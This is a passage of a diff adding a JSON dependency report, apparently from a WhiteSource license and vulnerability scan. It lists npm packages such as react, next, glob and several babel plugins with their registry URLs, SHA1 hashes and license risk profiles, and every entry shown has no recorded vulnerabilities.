"npm-audit-resolver-2.1.0.tgz", + "version": "2.1.0", + "groupId": "npm-audit-resolver", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c55b2c4e-7db6-4d09-9413-0b5634cf0498" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b2bd932e-c837-474d-96f8-209cc20d05f3", + "keyId": 28670259, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/contentful-cli/-/contentful-cli-1.1.5.tgz", + "homePage": "https://github.com/contentful/contentful-cli#readme", + "genericPackageIndex": "https://www.npmjs.org/package/contentful-cli" + }, + "matchType": "SHA1", + "sha1": "a6d5323eebe9cff447c5bb8c9f884220d662a9ac", + "name": "contentful-cli-1.1.5.tgz", + "artifactId": "contentful-cli-1.1.5.tgz", + "version": "1.1.5", + "groupId": "contentful-cli", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/49a699e6-cee6-4550-87f2-b7a7f3fe5f9c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "dfc84bd6-bcf7-4aed-ac88-2a77ed52663d", + "keyId": 26955644, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/run-queue/-/run-queue-1.0.3.tgz", + "homePage": "https://npmjs.com/package/run-queue", + "genericPackageIndex": "https://www.npmjs.org/package/run-queue" + }, + "matchType": "SHA1", + "sha1": "e848396f057d223f24386924618e25694161ec47", + "name": "run-queue-1.0.3.tgz", + "artifactId": "run-queue-1.0.3.tgz", + "version": "1.0.3", + "groupId": "run-queue", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/iarna/run-queue/blob/v1.0.3/package.json" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fbeb6107-274d-4742-bd52-0ee7610af7c4", + "keyId": 28546939, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/flatten/-/flatten-1.0.3.tgz", + "homePage": "https://github.com/mk-pmb/flatten-js/#readme", + "genericPackageIndex": "https://www.npmjs.org/package/flatten" + }, + "matchType": "SHA1", + "sha1": "c1283ac9f27b368abc1e36d1ff7b04501a30356b", + "name": "flatten-1.0.3.tgz", + "artifactId": "flatten-1.0.3.tgz", + "version": "1.0.3", + "groupId": "flatten", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/flatten" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "34035cd2-cd4d-4591-8c86-6803cdaffe86", + "keyId": 28484279, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/browserslist/-/browserslist-4.7.2.tgz", + "homePage": "https://github.com/browserslist/browserslist#readme", + "genericPackageIndex": "https://www.npmjs.org/package/browserslist" + }, + "matchType": "SHA1", + "sha1": "1bb984531a476b5d389cedecb195b2cd69fb1348", + "name": "browserslist-4.7.2.tgz", + "artifactId": "browserslist-4.7.2.tgz", + "version": "4.7.2", + "groupId": "browserslist", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/fcc0fb11-7707-4ab1-9942-def25c25a9f7" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a3ccdabc-9eff-4505-b046-ec07cf585639", + "keyId": 26966941, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/unique-filename/-/unique-filename-1.1.1.tgz", + "homePage": "https://github.com/iarna/unique-filename", + "genericPackageIndex": "https://www.npmjs.org/package/unique-filename" + }, + "matchType": "SHA1", + "sha1": "1d69769369ada0583103a1e6ae87681b56573230", + "name": "unique-filename-1.1.1.tgz", + "artifactId": "unique-filename-1.1.1.tgz", + "version": "1.1.1", + "groupId": "unique-filename", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/unique-filename/v/1.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4125bc67-806c-4d76-b863-3652156d64cc", + "keyId": 28597711, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/glob/-/glob-7.1.6.tgz", + "homePage": "https://github.com/isaacs/node-glob#readme", + "genericPackageIndex": "https://www.npmjs.org/package/glob" + }, + "matchType": "SHA1", + "sha1": "141f33b81a7c2492e125594307480c46679278a6", + "name": "glob-7.1.6.tgz", + "artifactId": "glob-7.1.6.tgz", + "version": "7.1.6", + "groupId": "glob", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/glob/v/7.1.6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b17356bb-45f3-4740-a59f-89fc413787e5", + "keyId": 27179655, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/flush-write-stream/-/flush-write-stream-1.1.1.tgz", + "homePage": "https://github.com/mafintosh/flush-write-stream", + "genericPackageIndex": "https://www.npmjs.org/package/flush-write-stream" + }, + "matchType": "SHA1", + "sha1": "8dd7d873a1babc207d94ead0c2e0e44276ebf2e8", + "name": "flush-write-stream-1.1.1.tgz", + "artifactId": "flush-write-stream-1.1.1.tgz", + "version": "1.1.1", + "groupId": "flush-write-stream", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b045981b-c15e-45b4-8333-f728628d813f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e71c2434-c43c-4cb5-b3c1-d477c87b0bbe", + "keyId": 28481474, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-2.1.0.tgz", + "homePage": "https://github.com/yahoo/serialize-javascript", + "genericPackageIndex": "https://www.npmjs.org/package/serialize-javascript" + }, + "matchType": "SHA1", + "sha1": "9310276819efd0eb128258bb341957f6eb2fc570", + "name": "serialize-javascript-2.1.0.tgz", + "artifactId": "serialize-javascript-2.1.0.tgz", + "version": "2.1.0", + "groupId": "serialize-javascript", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/serialize-javascript" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d4852c24-d338-4760-9559-e1a6283a9fcb", + "keyId": 28586072, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-member-expression-to-functions/-/helper-member-expression-to-functions-7.7.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-member-expression-to-functions" + }, + "matchType": "SHA1", + "sha1": "472b93003a57071f95a541ea6c2b098398bcad8a", + "name": "helper-member-expression-to-functions-7.7.0.tgz", + "artifactId": "helper-member-expression-to-functions-7.7.0.tgz", + "version": "7.7.0", + "groupId": "@babel/helper-member-expression-to-functions", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/92245ee3-4035-45e6-a503-baac454026aa" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5e998220-d765-4a07-98fd-e632c6ad6642", + "keyId": 26948659, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "homePage": "https://github.com/isaacs/once#readme", + "genericPackageIndex": "https://www.npmjs.org/package/once" + }, + "matchType": "SHA1", + "sha1": "583b1aa775961d4b113ac17d9c50baef9dd76bd1", + "name": "once-1.4.0.tgz", + "artifactId": "once-1.4.0.tgz", + "version": "1.4.0", + "groupId": "once", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/once" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a2ff053b-9f33-4e0d-ae9c-434817dd66a6", + "keyId": 28619054, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/qs/-/qs-6.9.1.tgz", + "homePage": "https://github.com/ljharb/qs", + "genericPackageIndex": "https://www.npmjs.org/package/qs" + }, + "matchType": "SHA1", + "sha1": "20082c65cb78223635ab1a9eaca8875a29bf8ec9", + "name": "qs-6.9.1.tgz", + "artifactId": "qs-6.9.1.tgz", + "version": "6.9.1", + "groupId": "qs", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9c435715-1b8e-4de3-9413-2f1786320bf7" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9d9089d4-9065-4e3c-9b8c-e050c4ded60f", + "keyId": 28646298, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.25.tgz", + "homePage": "https://github.com/jshttp/mime-types#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mime-types" + }, + "matchType": "SHA1", + "sha1": "39772d46621f93e2a80a856c53b86a62156a6437", + "name": "mime-types-2.1.25.tgz", + "artifactId": "mime-types-2.1.25.tgz", + "version": "2.1.25", + "groupId": "mime-types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/mime-types/v/2.1.25" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "566506cf-34c8-40b7-bcbd-fb9bc668a39b", + "keyId": 28677340, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/react-lazy-load-image-component/-/react-lazy-load-image-component-1.3.2.tgz", + "homePage": "https://github.com/Aljullu/react-lazy-load-image-component#readme", + "genericPackageIndex": "https://www.npmjs.org/package/react-lazy-load-image-component" + }, + "matchType": "SHA1", + "sha1": "2182d6ed864feb15c30067e04e52cbcdcfc86860", + "name": "react-lazy-load-image-component-1.3.2.tgz", + "artifactId": "react-lazy-load-image-component-1.3.2.tgz", + "version": "1.3.2", + "groupId": "react-lazy-load-image-component", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f9939517-0945-448a-ae8f-ad649f09ad27" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "516012df-77e7-4e69-b2f7-c6a6ebc0d41d", + "keyId": 28689808, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/react/-/react-16.12.0.tgz", + "homePage": "https://reactjs.org/", + "genericPackageIndex": "https://www.npmjs.org/package/react" + }, + "matchType": "SHA1", + "sha1": "0c0a9c6a142429e3614834d5a778e18aa78a0b83", + "name": "react-16.12.0.tgz", + "artifactId": "react-16.12.0.tgz", + "version": "16.12.0", + "groupId": "react", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/cdc337ca-c5c3-4516-8a5f-7b0de2b3899d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "46fb987a-6437-4c08-9f0c-fd6a40c4a9e3", + "keyId": 28689806, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/react-dom/-/react-dom-16.12.0.tgz", + "homePage": "https://reactjs.org/", + "genericPackageIndex": "https://www.npmjs.org/package/react-dom" + }, + "matchType": "SHA1", + "sha1": "0da4b714b8d13c2038c9396b54a92baea633fe11", + "name": "react-dom-16.12.0.tgz", + "artifactId": "react-dom-16.12.0.tgz", + "version": "16.12.0", + "groupId": "react-dom", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c604bc9b-1d23-45d9-9b23-54b2d73509dd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "471ef869-0867-4cda-8379-1592eb54120e", + "keyId": 28706690, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/informed/-/informed-2.11.16.tgz", + "homePage": "https://github.com/joepuzzo/informed#readme", + "genericPackageIndex": "https://www.npmjs.org/package/informed" + }, + "matchType": "SHA1", + "sha1": "85686c3aa0a52ab6a2c911b498a3fdb193c1bba7", + "name": "informed-2.11.16.tgz", + "artifactId": "informed-2.11.16.tgz", + "version": "2.11.16", + "groupId": "informed", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7d1af851-3c14-40b4-bf4a-0d3f9dad90d2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7803668c-b5ab-483e-b736-763d0a5928b3", + "keyId": 28721708, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/styled-jsx/-/styled-jsx-3.2.4.tgz", + "homePage": "https://github.com/zeit/styled-jsx#readme", + "genericPackageIndex": "https://www.npmjs.org/package/styled-jsx" + }, + "matchType": "SHA1", + "sha1": "cbcdedcfb81d717fd355c4a0d8443f8e74527b60", + "name": "styled-jsx-3.2.4.tgz", + "artifactId": "styled-jsx-3.2.4.tgz", + "version": "3.2.4", + "groupId": "styled-jsx", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/8d8eb36b-55af-4a71-a0b8-5f17be58ab95" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a60b859c-af63-4c72-bf7a-4c69e9931b99", + "keyId": 28308648, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-3.1.0.tgz", + "homePage": "https://github.com/pillarjs/path-to-regexp#readme", + "genericPackageIndex": "https://www.npmjs.org/package/path-to-regexp" + }, + "matchType": "SHA1", + "sha1": "f45a9cc4dc6331ae8f131e0ce4fde8607f802367", + "name": "path-to-regexp-3.1.0.tgz", + "artifactId": "path-to-regexp-3.1.0.tgz", + "version": "3.1.0", + "groupId": "path-to-regexp", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/path-to-regexp/v/3.1.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0c3d7e2a-27f7-4790-8708-1d7ffa6c56c7", + "keyId": 28721706, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@sentry/browser/-/browser-5.9.1.tgz", + "homePage": "https://github.com/getsentry/sentry-javascript/tree/master/packages/browser", + "genericPackageIndex": "https://www.npmjs.org/package/@sentry/browser" + }, + "matchType": "SHA1", + "sha1": "b2ec27ead501a49f26807a9c0774f44f4292f236", + "name": "browser-5.9.1.tgz", + "artifactId": "browser-5.9.1.tgz", + "version": "5.9.1", + "groupId": "@sentry/browser", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/getsentry/sentry-javascript/blob/5.9.1/LICENSE" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "10d4a171-972a-4331-9fe4-850031cc7b00", + "keyId": 28721707, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/next/-/next-9.1.4.tgz", + "homePage": "https://nextjs.org", + "genericPackageIndex": "https://www.npmjs.org/package/next" + }, + "matchType": "SHA1", + "sha1": "32991dd6b49adca4bac302828eb5a1b3654591b6", + "name": "next-9.1.4.tgz", + "artifactId": "next-9.1.4.tgz", + "version": "9.1.4", + "groupId": "next", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/next" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7dcf69c9-a51f-4e80-8dc1-1052ef36c47a", + "keyId": 28751088, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.7.4.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-syntax-nullish-coalescing-operator" + }, + "matchType": "SHA1", + "sha1": "e53b751d0c3061b1ba3089242524b65a7a9da12b", + "name": "plugin-syntax-nullish-coalescing-operator-7.7.4.tgz", + "artifactId": "plugin-syntax-nullish-coalescing-operator-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/plugin-syntax-nullish-coalescing-operator", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-syntax-nullish-coalescing-operator/v/7.7.4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bc39f67b-4525-4edc-bf3e-710add57d0e2", + "keyId": 28751093, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-proposal-nullish-coalescing-operator/-/plugin-proposal-nullish-coalescing-operator-7.7.4.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-proposal-nullish-coalescing-operator" + }, + "matchType": "SHA1", + "sha1": "7db302c83bc30caa89e38fee935635ef6bd11c28", + "name": "plugin-proposal-nullish-coalescing-operator-7.7.4.tgz", + "artifactId": "plugin-proposal-nullish-coalescing-operator-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/plugin-proposal-nullish-coalescing-operator", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-proposal-nullish-coalescing-operator/v/7.7.4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5fe771f1-c4bf-4aac-b6db-99834662ca8b", + "keyId": 28751098, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-proposal-optional-chaining/-/plugin-proposal-optional-chaining-7.7.4.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-proposal-optional-chaining" + }, + "matchType": "SHA1", + "sha1": "3f04c2de1a942cbd3008324df8144b9cbc0ca0ba", + "name": "plugin-proposal-optional-chaining-7.7.4.tgz", + "artifactId": "plugin-proposal-optional-chaining-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/plugin-proposal-optional-chaining", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-proposal-optional-chaining" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "589b24d6-85b8-499b-a9e4-81838ef7e9e9", + "keyId": 28751087, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.7.4.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-syntax-optional-chaining" + }, + "matchType": "SHA1", + "sha1": "c91fdde6de85d2eb8906daea7b21944c3610c901", + "name": "plugin-syntax-optional-chaining-7.7.4.tgz", + "artifactId": "plugin-syntax-optional-chaining-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/plugin-syntax-optional-chaining", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-syntax-optional-chaining/v/7.7.4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bb393b9d-4afe-4e5b-abb6-c55b7b5356e9", + "keyId": 28751090, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/dd-trace/-/dd-trace-0.16.1.tgz", + "homePage": "https://github.com/DataDog/dd-trace-js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/dd-trace" + }, + "matchType": "SHA1", + "sha1": "c8189af5581cf24a710a61222448d8fb93699d1e", + "name": "dd-trace-0.16.1.tgz", + "artifactId": "dd-trace-0.16.1.tgz", + "version": "0.16.1", + "groupId": "dd-trace", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/dd-trace" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8d91f9b4-ed35-4a6b-9759-cb1ccabb961e", + "keyId": 28750187, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/generator/-/generator-7.7.4.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/generator" + }, + "matchType": "SHA1", + "sha1": "db651e2840ca9aa66f327dcec1dc5f5fa9611369", + "name": "generator-7.7.4.tgz", + "artifactId": "generator-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/generator", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/generator/v/7.7.4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ca0d85e5-fa0a-4a54-86c4-0d525b40a376", + "keyId": 28750199, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.7.4.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-function-name" + }, + "matchType": "SHA1", + "sha1": "ab6e041e7135d436d8f0a3eca15de5b67a341a2e", + "name": "helper-function-name-7.7.4.tgz", + "artifactId": "helper-function-name-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/helper-function-name", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/helper-function-name" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "80e16799-731a-42f4-b810-e71b51e7fc63", + "keyId": 28751099, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.7.4.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helpers" + }, + "matchType": "SHA1", + "sha1": "62c215b9e6c712dadc15a9a0dcab76c92a940302", + "name": "helpers-7.7.4.tgz", + "artifactId": "helpers-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/helpers", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM 